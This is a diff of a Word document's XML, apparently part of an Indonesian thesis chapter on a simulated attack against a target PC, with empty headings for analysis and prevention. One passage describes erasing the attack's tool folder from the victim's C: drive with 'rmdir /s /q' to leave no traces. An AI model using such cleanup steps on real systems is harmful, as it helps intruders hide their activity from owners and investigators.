+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4584882" cy="2175191"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="128" w:name="_Toc43194866"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>17</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Berhasil Dikirimkan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="128"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Pengujian Menghapus Folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Langkah terakhir dari rangkaian penyerangan yang dilakukan adalah dengan menghapus folder chrome dari direktori C: komputer target sehingga tidak meninggalkan jejak penyerangan yang mencurigakan. Pada Gambar IV-16 berikut ditampilkan baris perintah untuk megakhiri penyerangan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:keepNext/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404335DF" wp14:editId="187BF004">
+            <wp:extent cx="4595854" cy="2414879"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="50" name="Picture 50"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4621254" cy="2428225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="129" w:name="_Toc43194867"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gambar V- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Gambar_V- \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>18</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>. Baris Perintah Mengakhiri Penyerangan</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="129"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Berdasarkan gambar diatas, dapat dilihat alur dalam mengakhiri penyerangan ini diawali dengan kembali ke direktori C: kemudian</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> menggunakan perintah </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">“rmdir /s /q” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">untuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> menghapus </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">folder chrome yang memiliki berisi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>tools</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> yag telah digunakan selama penyerangan. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Setelah folder chrome terhapus maka langkah paling akhir adalah dengan keluar dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>command prompt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Kekurangan Sistem</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Analisis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:contextualSpacing w:val="0"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Rekomendasi Untuk Mencegah Penyerangan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Kesimpulan dan Saran</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="709"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -30965,17 +37057,16 @@
         </w:numPr>
         <w:ind w:left="431" w:hanging="143"/>
       </w:pPr>
-      <w:bookmarkStart w:id="115" w:name="_Toc43087426"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="130" w:name="_Toc43087426"/>
+      <w:r>
         <w:t>DAFTAR</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> PUSTAKA</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="47"/>
       <w:bookmarkEnd w:id="48"/>
-      <w:bookmarkEnd w:id="49"/>
-      <w:bookmarkEnd w:id="115"/>
+      <w:bookmarkEnd w:id="130"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -31604,7 +37695,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId19"/>
+      <w:footerReference w:type="default" r:id="rId37"/>
       <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
       <w:pgMar w:top="1701" w:right="1701" w:bottom="1701" w:left="2268" w:header="851" w:footer="851" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -32273,6 +38364,188 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1A05768A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6644C03E"/>
+    <w:lvl w:ilvl="0" w:tplc="4BAC776C">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="V.1.%1"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1446" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="246C0015"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="BB92523A"/>
+    <w:lvl w:ilvl="0" w:tplc="C3949F50">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="V.%1"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1446" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25A30C17"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="578279D0"/>
@@ -32392,7 +38665,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="268B683F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F112FF56"/>
@@ -32478,7 +38751,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="28D36DBF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5838BCD8"/>
@@ -32567,7 +38840,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2BFC23A1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3BAE04F8"/>
@@ -32656,7 +38929,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2E86181A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="ECC4B56A"/>
@@ -32772,7 +39045,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2FE77AD1"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="D64C9C5E"/>
@@ -32917,7 +39190,98 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="33FE4E8E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C43E0942"/>
+    <w:lvl w:ilvl="0" w:tplc="59FECB00">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="V.1.3.%1"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1446" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="3809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="38090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="3809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="347370D1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C3B44C22"/>
@@ -33006,7 +39370,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3674340B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B1E8BA16"/>
@@ -33092,7 +39456,7 @@
